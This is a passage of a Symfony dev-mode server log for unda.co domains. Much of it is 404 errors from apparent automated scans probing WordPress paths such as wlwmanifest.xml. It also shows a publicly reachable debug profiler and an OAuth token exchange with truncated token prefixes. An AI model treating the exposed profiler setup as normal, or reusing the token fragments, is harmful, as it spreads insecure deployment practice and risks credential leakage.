  8697. [2025-12-21 00:04:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8698. [2025-12-21 00:04:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/crop/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/crop/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8699. [2025-12-21 00:04:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8700. [2025-12-21 00:05:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8701. [2025-12-21 00:05:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8702. [2025-12-21 00:05:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8703. [2025-12-21 00:06:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"662038","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/662038?panel=db","method":"GET"} []
  8704. [2025-12-21 00:06:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  8705. [2025-12-21 00:06:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //feed/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //feed/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8706. [2025-12-21 00:06:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //blog/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //blog/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8707. [2025-12-21 00:06:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //web/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //web/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8708. [2025-12-21 00:06:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wordpress/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wordpress/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8709. [2025-12-21 00:06:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8710. [2025-12-21 00:06:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2020/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2020/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8711. [2025-12-21 00:07:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2019/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2019/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8712. [2025-12-21 00:07:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2021/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2021/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8713. [2025-12-21 00:07:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //shop/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //shop/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8714. [2025-12-21 00:07:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp1/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp1/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8715. [2025-12-21 00:07:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //test/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //test/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8716. [2025-12-21 00:07:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //site/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //site/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8717. [2025-12-21 00:07:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //cms/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //cms/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8718. [2025-12-21 00:08:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8719. [2025-12-21 00:12:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=swiftmailer","method":"GET"} []
  8720. [2025-12-21 00:12:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  8721. [2025-12-21 00:14:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=time","method":"GET"} []
  8722. [2025-12-21 00:14:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  8723. [2025-12-21 00:17:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  8724. [2025-12-21 00:18:06] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  8725. [2025-12-21 00:19:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8ae359","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8ae359?panel=cache","method":"GET"} []
  8726. [2025-12-21 00:19:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  8727. [2025-12-21 00:19:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //feed/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //feed/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8728. [2025-12-21 00:19:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //blog/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //blog/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8729. [2025-12-21 00:19:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //web/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //web/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8730. [2025-12-21 00:19:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wordpress/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wordpress/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8731. [2025-12-21 00:19:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8732. [2025-12-21 00:19:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2020/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2020/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8733. [2025-12-21 00:19:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2019/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2019/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8734. [2025-12-21 00:19:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2021/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2021/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8735. [2025-12-21 00:19:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //shop/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //shop/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8736. [2025-12-21 00:19:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp1/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp1/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8737. [2025-12-21 00:19:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //test/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //test/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8738. [2025-12-21 00:19:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //site/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //site/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8739. [2025-12-21 00:19:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //cms/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //cms/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8740. [2025-12-21 00:20:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=validator","method":"GET"} []
  8741. [2025-12-21 00:20:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  8742. [2025-12-21 00:26:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=dump","method":"GET"} []
  8743. [2025-12-21 00:26:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  8744. [2025-12-21 00:29:50] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  8745. [2025-12-21 00:29:50] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  8746. [2025-12-21 00:29:50] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["ac37f938310f627b158741a7fa [...]"] []
  8747. [2025-12-21 00:29:50] doctrine.DEBUG: "START TRANSACTION" [] []
  8748. [2025-12-21 00:29:50] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"b3733e61425934f11fb43f9cbc [...]","3":"2025-12-21 00:59:50","4":"","5":398,"6":"[]"} []
  8749. [2025-12-21 00:29:50] doctrine.DEBUG: "COMMIT" [] []
  8750. [2025-12-21 00:29:50] doctrine.DEBUG: "START TRANSACTION" [] []
  8751. [2025-12-21 00:29:50] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"9475b21af35afb95ae7be847dc [...]","3":"2026-02-19 00:29:50","4":"","5":398,"6":"[]"} []
  8752. [2025-12-21 00:29:50] doctrine.DEBUG: "COMMIT" [] []
